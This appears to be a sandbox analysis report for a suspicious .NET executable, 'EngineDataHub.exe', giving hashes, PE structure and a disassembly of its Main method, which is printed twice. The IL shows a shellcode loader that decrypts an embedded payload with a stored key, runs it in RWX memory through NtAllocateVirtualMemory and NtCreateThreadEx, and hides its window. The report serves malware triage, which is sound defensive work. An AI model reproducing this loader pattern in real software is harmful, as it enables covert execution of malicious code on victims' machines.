Suspicious
Suspect

0052f4f8ce7c45cfd10165ffd8fd044f

PE Executable
|
MD5: 0052f4f8ce7c45cfd10165ffd8fd044f
|
Size: 1.25 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
 Hash Value
MD5
0052f4f8ce7c45cfd10165ffd8fd044f
Sha1
f87080e76461d1a6d144ae205f08dc0ad891e0f1
Sha256
e691dcafd1d329091197791751faf5a54ea531b2314ce60ed962bf82839d3426
Sha384
eec6cce231068adcfba103c7f41edd906f7be869b520419e9dfbbd813a8178f558df0c12bbbc146efcde60046a4297f4
Sha512
3ce6bed6cd5c72a9ade07a8378d648114c433ea5777d151f04ecd8fdf02189bf994543e99c0cd126470d8217f80319a3c09772a0af50cd46e1245622292b873f
SSDeep
6144:YQyIx9N6lkOx58ck4LH2f813D5t24jSm9IP9BeVyA/WA5QaUned2woS:YdIx9N6f2E13toxFBeVyA/W4oeE
TLSH
C9451210465A531EDB6AC77A15072FB4576CEC1AEF8783EF9AC9EC203D0A6E00535EE1

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
0052f4f8ce7c45cfd10165ffd8fd044f
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

EngineDataHub.exe
Full Name

EngineDataHub.exe
EntryPoint

System.Void Stub.Program::Main()
Scope Name

EngineDataHub.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

EngineDataHub
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

19
Main Method

System.Void Stub.Program::Main()
Main IL Instruction Count

98
Main IL

ldsfld System.Byte[] Stub.Program::EncryptedShellcode ldstr BjpaPxvkkR/iTWPkap1+KecII9yNyDbNhVtvOs1yhqI= ldstr BZaXKI3kjCuhPnqen45s5A== call System.Byte[] Stub.Program::DecryptShellcode(System.Byte[],System.String,System.String) stloc.0 <null> ldloc.0 <null> brfalse.s IL_001D: leave IL_012D ldloc.0 <null> ldlen <null> conv.i4 <null> brtrue.s IL_0022: ldsfld System.IntPtr System.IntPtr::Zero leave IL_012D: ret ldsfld System.IntPtr System.IntPtr::Zero stloc.1 <null> ldloca.s V_2 ldloc.0 <null> ldlen <null> conv.i4 <null> newobj System.Void System.IntPtr::.ctor(System.Int32) stobj System.IntPtr ldc.i4.m1 <null> call System.IntPtr System.IntPtr::op_Explicit(System.Int32) ldloca.s V_1 ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_2 ldc.i4 12288 ldc.i4.s 64 call System.UInt32 Stub.Program::NtAllocateVirtualMemory(System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr&,System.UInt32,System.UInt32) pop <null> ldloc.1 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_0065: ldloc.0 leave IL_012D: ret ldloc.0 <null> ldc.i4.0 <null> ldloc.1 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloca.s V_3 ldc.i4 2097151 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.m1 <null> call System.IntPtr System.IntPtr::op_Explicit(System.Int32) ldloc.1 <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4 1048576 ldc.i4 1048576 ldsfld System.IntPtr System.IntPtr::Zero call System.UInt32 Stub.Program::NtCreateThreadEx(System.IntPtr&,System.UInt32,System.IntPtr,System.IntPtr,System.IntPtr,System.IntPtr,System.Boolean,System.UInt32,System.UInt32,System.UInt32,System.IntPtr) pop <null> ldloc.3 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_00AE: ldloc.3 leave.s IL_012D: ret ldloc.3 <null> ldc.i4.0 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.UInt32 Stub.Program::NtWaitForSingleObject(System.IntPtr,System.Boolean,System.IntPtr) pop <null> ldloc.3 <null> call System.UInt32 Stub.Program::NtClose(System.IntPtr) pop <null> leave.s IL_00C7: call System.Void Stub.Program::ProcessJunkData() pop <null> leave.s IL_00C7: call System.Void Stub.Program::ProcessJunkData() call System.Void Stub.Program::ProcessJunkData() call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) newobj System.Void System.Windows.Forms.Form::.ctor() stloc.s V_4 ldloc.s V_4 ldstr EngineDataHub callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_ShowInTaskbar(System.Boolean) ldloc.s V_4 ldc.r8 0 callvirt System.Void System.Windows.Forms.Form::set_Opacity(System.Double) ldloc.s V_4 ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 brtrue.s IL_011C: ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 ldnull <null> ldftn System.Void Stub.Program::<Main>b__0(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) stsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 callvirt System.Void System.Windows.Forms.Form::add_Load(System.EventHandler) ldloc.s V_4 call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) ret <null>
Module Name

EngineDataHub.exe
Full Name

EngineDataHub.exe
EntryPoint

System.Void Stub.Program::Main()
Scope Name

EngineDataHub.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

EngineDataHub
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

19
Main Method

System.Void Stub.Program::Main()
Main IL Instruction Count

98
Main IL

ldsfld System.Byte[] Stub.Program::EncryptedShellcode ldstr BjpaPxvkkR/iTWPkap1+KecII9yNyDbNhVtvOs1yhqI= ldstr BZaXKI3kjCuhPnqen45s5A== call System.Byte[] Stub.Program::DecryptShellcode(System.Byte[],System.String,System.String) stloc.0 <null> ldloc.0 <null> brfalse.s IL_001D: leave IL_012D ldloc.0 <null> ldlen <null> conv.i4 <null> brtrue.s IL_0022: ldsfld System.IntPtr System.IntPtr::Zero leave IL_012D: ret ldsfld System.IntPtr System.IntPtr::Zero stloc.1 <null> ldloca.s V_2 ldloc.0 <null> ldlen <null> conv.i4 <null> newobj System.Void System.IntPtr::.ctor(System.Int32) stobj System.IntPtr ldc.i4.m1 <null> call System.IntPtr System.IntPtr::op_Explicit(System.Int32) ldloca.s V_1 ldsfld System.IntPtr System.IntPtr::Zero ldloca.s V_2 ldc.i4 12288 ldc.i4.s 64 call System.UInt32 Stub.Program::NtAllocateVirtualMemory(System.IntPtr,System.IntPtr&,System.IntPtr,System.IntPtr&,System.UInt32,System.UInt32) pop <null> ldloc.1 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_0065: ldloc.0 leave IL_012D: ret ldloc.0 <null> ldc.i4.0 <null> ldloc.1 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloca.s V_3 ldc.i4 2097151 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.m1 <null> call System.IntPtr System.IntPtr::op_Explicit(System.Int32) ldloc.1 <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4 1048576 ldc.i4 1048576 ldsfld System.IntPtr System.IntPtr::Zero call System.UInt32 Stub.Program::NtCreateThreadEx(System.IntPtr&,System.UInt32,System.IntPtr,System.IntPtr,System.IntPtr,System.IntPtr,System.Boolean,System.UInt32,System.UInt32,System.UInt32,System.IntPtr) pop <null> ldloc.3 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) brfalse.s IL_00AE: ldloc.3 leave.s IL_012D: ret ldloc.3 <null> ldc.i4.0 <null> ldsfld System.IntPtr System.IntPtr::Zero call System.UInt32 Stub.Program::NtWaitForSingleObject(System.IntPtr,System.Boolean,System.IntPtr) pop <null> ldloc.3 <null> call System.UInt32 Stub.Program::NtClose(System.IntPtr) pop <null> leave.s IL_00C7: call System.Void Stub.Program::ProcessJunkData() pop <null> leave.s IL_00C7: call System.Void Stub.Program::ProcessJunkData() call System.Void Stub.Program::ProcessJunkData() call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) newobj System.Void System.Windows.Forms.Form::.ctor() stloc.s V_4 ldloc.s V_4 ldstr EngineDataHub callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) ldloc.s V_4 ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_ShowInTaskbar(System.Boolean) ldloc.s V_4 ldc.r8 0 callvirt System.Void System.Windows.Forms.Form::set_Opacity(System.Double) ldloc.s V_4 ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 brtrue.s IL_011C: ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 ldnull <null> ldftn System.Void Stub.Program::<Main>b__0(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) stsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 ldsfld System.EventHandler Stub.Program::CS$<>9__CachedAnonymousMethodDelegate2 callvirt System.Void System.Windows.Forms.Form::add_Load(System.EventHandler) ldloc.s V_4 call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) ret <null>
0052f4f8ce7c45cfd10165ffd8fd044f (1.25 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙